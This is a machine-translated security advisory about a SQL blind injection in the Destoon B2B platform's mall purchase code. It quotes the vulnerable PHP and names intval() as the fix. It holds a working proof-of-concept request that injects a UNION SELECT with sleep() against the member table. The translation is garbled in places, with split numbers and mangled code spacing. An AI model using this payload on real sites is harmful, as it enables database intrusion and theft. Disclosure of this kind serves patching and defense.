Destoon B2B website software to the latest version of SQL blind injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201341024
Type myhack58
Reporter hawkish001@乌云
Modified 2013-10-21T00:00:00


Brief description:

Destoon B2B website existsSQL injectionvulnerabilities have played a 2 0 1 3 0 7 0 3 patches

Detailed description:

/module/mall/ this file, in addition to the already fix the know Chong Yu reported that injection point, but also the presence of other injection points.

if($submit) {

require DT_ROOT.'/ module/'.$ module.'/ cart.class.php';

$do = new cart();

$cart = $do->get();

if($post) {

$add = array_map('trim', $add);

$add['address'] = area_pos($add['areaid'], ").$ add['address'];

$add = array_map('htmlspecialchars', $add);

$buyer_address = $add['address'];

if(strlen($buyer_address) < 1 0) message($L['msg_type_address']);

$buyer_postcode = $add['postcode'];

if(strlen($buyer_postcode) < 6) message($L['msg_type_postcode']);

$buyer_name = $add['truename'];

if(strlen($buyer_name) < 2) message($L['msg_type_truename']);

$buyer_mobile = $add['mobile'];

if(strlen($buyer_mobile) < 1 1) message($L['msg_type_mobile']);

$buyer_phone = $add['telephone'];

$buyer_receive = $add['receive'];

if(strlen($buyer_receive) < 2) message($L['msg_type_express']);

$i = 0;

foreach($post as $k=>$v) {

$t1 = explode('-', $k);

$itemid = $t1[0];

$s1 = $t1[1];

$s2 = $t1[2];

$s3 = $t1[3];

$t = $db->get_one("SELECT * FROM {$table} WHERE itemid=$itemid");

Where$submit,$post,$add is an external submission data.

Since$t = $db->get_one("SELECT * FROM {$table} WHERE itemid=$itemid");

Due to the$itemid from the$post array key assignment, is input to the control, and the SQL statement is not inside the single quotes surrounding$itemid,resulting in bypassing the GPC protection for union queries blind.

Vulnerability to prove:

Need to log in,

http://localhost/webapp/destoon/mall/buy.php?add[address]=abcdefghijklm&add[postcode]=abcdefghijklm&add[truename]=abcdefghijklm&add[mobile]=abcdefghijklm&add[telephone]=abcdefghijklm&add[receive]=abcdefghijklm&post[1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(1 0) from destoon_member]=b

While POST submit submit=1

I put the execution of the SQL statement printed out.


Repair solutions:

Data filtering, the integer data, use intval()